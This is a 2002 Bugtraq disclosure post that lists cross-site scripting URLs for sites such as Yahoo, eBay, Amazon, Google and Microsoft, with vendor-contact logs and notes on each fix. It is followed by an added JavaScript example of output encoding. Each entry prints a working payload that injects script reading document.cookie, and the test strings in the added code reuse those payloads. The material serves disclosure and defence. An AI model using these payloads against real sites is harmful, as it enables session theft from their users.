On April 26 I posted a message about Cross-Site scripting (see bottom). I mentioned that I had found Cross-site scripting flaws in many major websites but I did not publish the exact details of these flaws. After notifying the owners of these sites and giving them time to respond and fix the problem, I now feel I have to post the details to bugtraq.

This information and more on cross-site scripting can also be found on my website http://spoor12.edup.tudelft.nl/skylined which is updated almost daily.

Kind regards,
Berend-Jan Wever.

Cross-site scripting archive:

Here are all the sites that I know to have at least one cross-site scripting flaw. I have logged all the communication I have had with them. (Last update April 19, 2002)

www.search.com
http://www.search.com/search?q='><SCRIPT>alert(document.cookie)</SCRIPT>'
- 23 mar 2002 Reported @ "http://www.cnet.com/cnetsupport/contact/1,10161,0-3945,00.html"
- 28 mar 2002 Reported @ "http://www.search.com/feedback/"
--------------------------------------------------------------------------------
www.altavista.com
http://www.altavista.com/sites/search/web?q=*&kl="><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported @ "http://help.altavista.com/contact/search"
- 25 mar 2002 Reply by email: "We have forwarded your email to our engineering team for further investigation"
--------------------------------------------------------------------------------
edit.yahoo.com
http://edit.yahoo.com/config?.done="%20style="width:expression(document.write(document.cookie));
- 27 mar 2002 Reported to "arturo@yahoo-inc.com", "mfk@yahoo-inc.com"
--------------------------------------------------------------------------------
search.netscape.com
addressbook.netscape.com
http://search.netscape.com/search.psp?search="><SCRIPT>alert(document.cookie)</SCRIPT>
http://addressbook.netscape.com/search.adp?SearchStr="><SCRIPT>alert(document.cookie)</SCRIPT>
(Addressbook.netscape.com requires you to be logged in)
- 23 mar 2002 Reported @ "http://help.netscape.com/website/feedback.html"
--------------------------------------------------------------------------------
cq-search.ebay.com
http://cq-search.ebay.com/search/search.dll?MfcISAPICommand=GetResult&ht="><SCRIPT>alert(document.cookie)</SCRIPT>&query=a
- 26 mar 2002 Reported to "clalondeat_private"
- 27 mar 2002 Reply by email: "Reviewing the issue", "Do you have any suggestions?"
- 27 mar 2002 Gave some hints and told them about my CSS howto.
--------------------------------------------------------------------------------
www.amazon.com
http://www.amazon.com/exec/obidos/ASIN/B00005T68P/ref%3D%20style%3Dwidth%3Aexpression%28document.write%28document.cookie%29%29%20/
- 23 mar 2002 Reported @ "http://www.amazon.com/exec/obidos/handle-generic-form/102-3185800-6674542?action=next-page&target=stores/help/self-service-email-form-dispatch.html&display=basic&browse=560710&method=GET&cgi-post-result=1/102-3185800-6674542."
- 26 mar 2002 "Cyrusat_private" responded to my bugtraq post
- 26 mar 2002 Reported to "Cyrusat_private"
- 26 mar 2002 Told them about my CSS howto.
--------------------------------------------------------------------------------
www.looksmart.com
cnn.looksmart.com
http://www.looksmart.com/r_search?look=&key=><SCRIPT>alert(document.cookie)</SCRIPT>
http://cnn.looksmart.com/r_search?look=&key=><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "feedbackat_private"
--------------------------------------------------------------------------------
www.time.com
http://www.time.com/time/searchresults?query=a&summaries="%20style="width:expression(document.write(document.cookie))"
- 23 mar 2002 Reported to "dailyat_private"
- 26 mar 2002 Reported to "Renee_Guttmannat_private"
--------------------------------------------------------------------------------
www.infospace.com
http://www.infospace.com/info.xcite/dog/newsresults.htm?&qkw="><SCRIPT>alert(document.cookie)</SCRIPT>&qcat=news&fs=nws
- 23 mar 2002 Reported @ "http://www.infospace.com/info/redirs_all.htm?pgtarg=abtct&"
--------------------------------------------------------------------------------
www.lasseters.com.au
http://www.lasseters.com.au/default3.asp?Network="%20onload="alert(document.cookie);"%20z="
- 28 mar 2002 Reported @ "http://www.lasseters.com.au/help/onetoone.html" to Karl F (chatid 114640)
- 28 mar 2002 Reported to "supportat_private"
- 28 mar 2002 (Automated) reply by email: "our priority is to respond to your query as soon as possible", tracking number T20020328004M
- 28 mar 2002 Reply by email: "We are investigating this issue very seriously", "I have passed this information onto the relevant department"
--------------------------------------------------------------------------------
my.abcnews.go.com
http://my.abcnews.go.com/localpageMainHandler?input=<SCRIPT>alert(document.cookie)</SCRIPT>
- 28 mar 2002 Reported @ "http://abcnews.go.com/service/Help/abccontactform.html"

Fixed cross-site scripting flaws archive

Here are all the cross-site scripting flaws I uncovered which have been fixed now. This is just to show how it was done and who have been found wanting.

www.redhat.com
http://www.redhat.com/apps/search/results.html?ie="><SCRIPT>alert(document.cookie)</SCRIPT>
- 26 mar 2002 "mjcat_private" responded to my bugtraq post.
- 26 mar 2002 Reported to "mjcat_private"
- 26 mar 2002 Reply from "tlancastat_private": "Fixed now"
--------------------------------------------------------------------------------
www.hotmail.com
See my MSN Hotmail Cross-site scripting page for more information
- 19 mar 2002 Reported @ "Report a bug on the Hotmail website" (url contained sensitive information ;)~
- 22 mar 2002 Reported to "supportat_private" - bounced
- 23 mar 2002 Reply from "abuseat_private": "Look at the help if you have any problems using hotmail"
- 27 mar 2002 Explained it was a serious issue to "abuseat_private"
- 27 mar 2002 Reply from "abuseat_private": "Your e-mail has been forwarded to the appropriate team"
- 28 mar 2002 Reply from "support_xat_private": "We have tried to reproduce the error, but have been unable to do so"
- 29 mar 2002 Sent a working example to "cs_servat_private"
- 30 mar 2002 Reply from "cs_servat_private": "We have confirmed the issue that you describe and are currently working on a fix"
- 30 mar 2002 Reply from "cs_servat_private": "we have isolated the bug and expect to have a fix for it out by Wednesday." (3 apr 2002)
The fix: as far as I could find out they now replace the properties 'dataFld', 'dataFormatAs' and 'dataSrc' of any HTML tag with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to prevent XML generation of HTML altogether.
MSN Hotmail has been very polite to thank me for bringing this to their attention multiple times.
--------------------------------------------------------------------------------
search.microsoft.com
http://search.microsoft.com/default.asp?qu=";%0D%0Aalert(document.cookie);%0D%0Aa="&boolean=ALL
This one was fixed within hours after discovery and without me notifying microsoft, now that's service!
--------------------------------------------------------------------------------
www.google.com
http://www.google.nl/search?as_q=a&ie="><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "webmasterat_private"
- 23 mar 2002 (Automated) reply by email: "you'll hear from us soon"
The fix: all '<' and '>' characters are replaced with '_'.
I have not received a word from Google except for the automated responses. (Guess whether I'm gonna report the next CSS to them...)
--------------------------------------------------------------------------------
www.nic.cc
http://www.nic.cc/cgi-bin/cart?domain=<SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "clientcareat_private"
The fix: filter out '<' and '>'.
I have not received a word from Nic.cc. (Guess whether I'm gonna report the next CSS to them...)
--------------------------------------------------------------------------------
support.microsoft.com
http://support.microsoft.com/default.aspx?scid=');} alert(document.cookie);{//
- 28 mar 2002 Reported to "supportat_private"
- 28 mar 2002 (Automated) reply by email: "Your e-mail <snip> will be handled personally by one of our Customer Service Representatives within 24 hours"
The fix: The ' in the exploit url used to end a string, but this string is now enclosed by " instead of ', and the " character is filtered out.
I have not received a word from microsoft support except for the automated responses. (Guess whether I'm gonna report the next CSS to them...)
--------------------------------------------------------------------------------
download.cnet.com
http://download.cnet.com/downloads/1,10150,0-10001-103-0-1-7,00.html?qt=<SCRIPT>alert(document.cookie)</SCRIPT>
- 28 mar 2002 Reported @ "http://download.cnet.com/downloads/0-10000-7-1532857.html?tag=subnav"
The fix: The characters <, > and " are replaced with &lt;, &gt; and &quot;.
--------------------------------------------------------------------------------
www.nu
http://www.nu/tour/tour_images.cfm?ID=EN&site=<SCRIPT>alert(document.cookie)</SCRIPT>
(The error report would suggest a SQL-injection vulnerability but I have not done further testing.)
- 23 mar 2002 Reported both CSS & SQL-injection to "dwdat_private"
- 19 apr 2002 The bug seems to have been fixed.
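The fixes logged above differ in quality: Google and nic.cc only strip '<' and '>', while cnet entity-encodes '<', '>' and '"'. The following is an added example (not part of the original post or any of the sites' code) that contrasts a strip-only filter with context-specific output encoding, using constructed inputs modelled on the attribute-breakout, style-expression and JS-string vectors in the list; the function names and the sample form are assumptions.

```javascript
// Added example, not from the original post: output encoding for the two
// injection contexts that recur in the archive above, an HTML attribute value
// and a quoted JavaScript string literal, next to the weak "strip < and >" fix.

// Encode every character that can terminate or re-purpose an attribute value
// (this is the cnet-style fix, plus '&' and "'" for completeness).
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Escape quotes, backslash, line terminators and angle brackets as \uXXXX so
// the value can close neither the enclosing JS string nor the <script> block.
function encodeForJsString(value) {
  return String(value).replace(/[\\'"<>\r\n\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The Google / nic.cc style fix: remove '<' and '>' only.
function stripAngleBrackets(value) {
  return String(value).replace(/[<>]/g, '_');
}

// Assumed server-side templates: a search box echoing the query, and an
// inline script assigning it to a variable.
function renderAttribute(value, encoder) {
  return '<input name="q" value="' + encoder(value) + '">';
}
function renderJsAssignment(value, encoder) {
  return 'var q = "' + encoder(value) + '";';
}

// Constructed inputs shaped like the vectors logged above.
const ATTR_BREAKOUT = '"><SCRIPT>alert(document.cookie)</SCRIPT>';
const STYLE_EXPRESSION = '" style="width:expression(document.write(document.cookie))';
const JS_STRING_BREAKOUT = '";\r\nalert(document.cookie);\r\na="';

// Checks: the output still contains exactly one attribute value with no
// stray quote, tag or extra attribute; the JS literal is a single string
// made only of safe characters and \uXXXX escapes.
function attributeIntact(html) {
  return /^<input name="q" value="[^"<>]*">$/.test(html);
}
function jsLiteralIntact(js) {
  return /^var q = "(?:[^"\\\r\n<>\u2028\u2029]|\\u[0-9a-f]{4})*";$/.test(js);
}
```

With the strip-only filter, both the attribute-breakout and the style-expression inputs still leave the attribute quote context, which is why the Time and Yahoo style-expression vectors need no angle brackets at all.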
This archive was generated by hypermail 2b30 : Sat Apr 20 2002 - 13:20:29 PDT